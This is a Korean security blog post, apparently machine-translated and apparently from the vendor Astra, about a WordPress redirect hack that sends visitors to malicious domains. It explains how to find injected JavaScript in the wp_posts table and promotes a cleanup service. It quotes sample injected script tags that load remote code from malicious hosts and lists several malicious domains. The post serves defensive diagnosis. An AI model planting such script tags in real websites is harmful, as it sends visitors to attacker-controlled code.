Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

방문자가 WordPress 블로그에서 악성 도메인으로 리디렉션됩니까? 지금 해결

WordPress 리디렉션 해킹은 오랫동안 위협적이었습니다. 몇 주마다 새로운 리디렉션 해킹으로 변모합니다. 우리는 이러한 모든 유형의 WordPress 리디렉션을 언제 어디서나 다루고 있습니다. 목록에 추가하면 또 다른 WordPress 리디렉션 해킹 유형을 발견할 수 있는 이 블로그 게시물이 있습니다. 이 해킹은 블로그 페이지 방문자를 악성 도메인으로 리디렉션합니다.

방문자가 WordPress 블로그에서 악성 도메인으로 리디렉션됩니까? 지금 해결

방문자가 WordPress 블로그에서 악성 도메인으로 리디렉션됩니까? 지금 해결

일부 악성 도메인에는 adaranth.[com], buyittraffic.[com], cuttraffic.[com], statistic[.]admarketlocation[.]com,이 있습니다. planeobservetoo1[.]라이브

감염 여부는 어떻게 확인하나요?

1. 증상 관찰

  • 요청하지 않은 도메인으로 리디렉션되는 방문자.
  • 블로그 페이지에 대한 Google 순위 하락
  • 불법 사이트 행위에 대해 Google로부터 경고 메시지를 받았습니다.
  • 귀하의 웹사이트가 블랙리스트에 올라 있습니다. 이 블랙리스트 검사기 도구로 쉽게 확인할 수 있습니다.
  • 웹페이지 소스 코드에 악성 링크가 있습니다.
웹사이트에서 블랙리스트 검색
당사 도구는 65개 이상의 블랙리스트를 스캔하여 귀하의 웹사이트가 블랙리스트에 있는지 확인합니다.

위의 증상 중 하나라도 나타나면 웹사이트가 해킹된 것입니다.

WordPress 블로그 리디렉션? 지금 수정하세요!

2. 멀웨어 스캐너로 확인

해킹을 확인할 수 있는 또 다른 방법은 맬웨어 스캐너로 웹사이트를 검사하는 것입니다. 이를 위해 온라인 맬웨어 스캐너를 사용할 수 있습니다. 웹사이트의 URL을 입력하고 스캔을 누르기만 하면 됩니다. .

방문자가 WordPress 블로그에서 악성 도메인으로 리디렉션됩니까? 지금 해결

방문자가 WordPress 블로그에서 악성 도메인으로 리디렉션됩니까? 지금 해결

해킹을 찾는 방법

거의 모든 리디렉션 해킹에는 데이터베이스 또는 코어 파일에 악성 코드 삽입이라는 동일한 공식이 있습니다. 이것도 다르지 않았습니다.

해킹을 분석한 결과, 해커가 데이터베이스에 악성 코드를 주입했음이 틀림없다는 결론을 도출합니다.

해커가 wp_posts에 JS 코드를 삽입했을 가능성이 높습니다. 데이터베이스의 테이블(웹사이트의 모든 게시물이 포함됨).

데이터베이스를 확인하는 방법은 다음과 같습니다.

  1. PHPMyAdmin을 사용하여 데이터베이스에 액세스합니다.
  2. wp_posts로 이동 테이블. 리디렉션 게시물로 이동하여 게시물에서 "adaranth.[com]"(또는 기타 악성 도메인)을 검색(Ctrl + F)합니다.

악성 코드의 예:

<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&amp;r=1536317274530” type=“text/javascript“></script>

해킹된 웹사이트에서 발견된 또 다른 악성 스크립트는 다음과 같았습니다.

<script src=’https://dl.gotosecond2.com/clizkes' type=‘text/javascript’></script>

다음에는 무엇을 해야 합니까?

감염을 제거하고 웹사이트를 보호하십시오.

멀웨어 정리가 지연될수록 더 많은 피해를 입힐 것입니다. Astra의 즉각적인 맬웨어 정리 프로그램을 선택하고 가입한 당일에 웹사이트를 정리하세요. Astra에서 전문적인 맬웨어 정리를 받으려면:

  1. Astra의 멀웨어 제거 프로그램에 가입
  2. 서버 자격 증명을 업데이트하면 됩니다.

당사의 보안 엔지니어가 6-8시간 이내에 웹사이트의 모든 숨겨진 백도어를 제거합니다. Astra의 해커 테스트를 거친 방화벽은 정리 후 웹사이트에 배포되어 향후 이러한 공격으로부터 보호합니다.

방문자가 WordPress 블로그에서 악성 도메인으로 리디렉션됩니까? 지금 해결

결론

웹 사이트가 깨끗하고 완벽하게 실행되면 권장되는 WordPress 보안 모범 사례를 따라 안전을 보장하십시오. 그 중 일부는 다음과 같습니다.

  • 웹사이트와 서버의 모든 계정에 대해 강력한 암호만 만들고 사용하십시오. 또한 자주 변경하십시오.
  • 기본 관리자 URL을 비정상적인 것으로 변경합니다.
  • 올바른 WordPress 파일 및 폴더 권한 설정
  • 관리 영역을 제한합니다.
  • 로그인 시도 제한 등

프로그램이나 Astra에 대해 질문이 있습니까? 우리와 채팅하세요.